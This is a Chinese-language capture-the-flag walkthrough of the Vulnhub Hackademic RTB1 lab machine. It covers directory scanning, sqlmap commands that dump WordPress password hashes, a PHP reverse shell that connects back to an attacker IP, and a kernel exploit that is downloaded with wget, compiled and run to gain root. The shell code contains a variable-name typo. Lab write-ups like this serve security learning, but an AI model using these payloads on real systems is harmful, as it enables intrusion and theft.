【Sword系列】Vulnhub靶机HACKADEMIC: RTB1 writeup

靶机介绍

官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/

需要读取靶机的root目录下key.txt

运行环境:

虚拟机网络设置的是NAT模式

靶机:IP地址:192.168.233.131

攻击机:kali linux,IP地址:192.168.233.129

信息收集

获取靶机IP地址

进入靶机

​​

用wappalyzer查看用到技术

查看开放的端口

扫敏感目录

复制代码
nikto -h http://192.168.233.131
dirb http://192.168.233.131/Hackademic_RTB1/
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.233.131

漏洞利用

web端寻找漏洞,php页面,f12代码注入,sql注入

sqlmap注入

复制代码
sqlmap -u http://192.168.243.128/Hackademic_RTB1/?cat=1 --dbs --batch

复制代码
sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables --batch

复制代码
sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns --batch

复制代码
sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump --batch

GeorgeMiller、q1w2e3登录

getshell

shell.php

复制代码
<div>
<?php
$sock = fsockopen('192.168.233.129','8888');
$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock);
$peocess = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>
</div>

上传shell

kali打开监听

运行反弹shell

反弹shell成功

提权

找敏感信息

查权限文件

复制代码
find / -user root -perm /4000 2>/dev/null
根目录     用户权限set uid   f文件类型,没有f会有目录

​搜索内核漏洞

复制代码
searchsploit 2.6.31

下载到本地searchsploit -m 15285.c

​kali开启web服务器

在靶机中下载

wget http://192.168.233.129/15285.c

wget ip地址/文件名

编译脚本

复制代码
gcc 15285.c -o exp

将编译的exp赋予执行权限并执行exp

提权成功id为0

相关推荐
许泽宇的技术分享39 分钟前
AudioNotes:当FunASR遇见Qwen2,音视频转笔记的技术革命
笔记·音视频
蒙奇D索大39 分钟前
【数据结构】图论核心应用:关键路径算法详解——从AOE网到项目管理实战
数据结构·笔记·学习·考研·算法·图论·改行学it
粟悟饭&龟波功41 分钟前
【网络安全】四、中级篇:SQL注入详解
sql·安全·web安全
Olrookie1 小时前
若依前后端分离版学习笔记(十八)——页面权限,页签缓存以及图标,字典,参数的使用
vue.js·笔记·学习
He BianGu1 小时前
【笔记】在WPF中Decorator是什么以及何时优先考虑 Decorator 派生类
笔记·wpf
wan5555cn1 小时前
AI视频生成技术:从想象到现实的视觉革命
人工智能·笔记·深度学习·算法·音视频
FIN666811 小时前
新天力:食品容器安全与创新的领航者
科技·安全·产品运营·创业创新·制造
alex10011 小时前
BeaverTails数据集:大模型安全对齐的关键资源与实战应用
人工智能·算法·安全
鹿鸣天涯11 小时前
Kali Linux 2025.3 正式发布:更贴近前沿的安全平台
linux·运维·安全
!chen11 小时前
Harbor磁盘空间清理指南:如何安全清理半年前的镜像
安全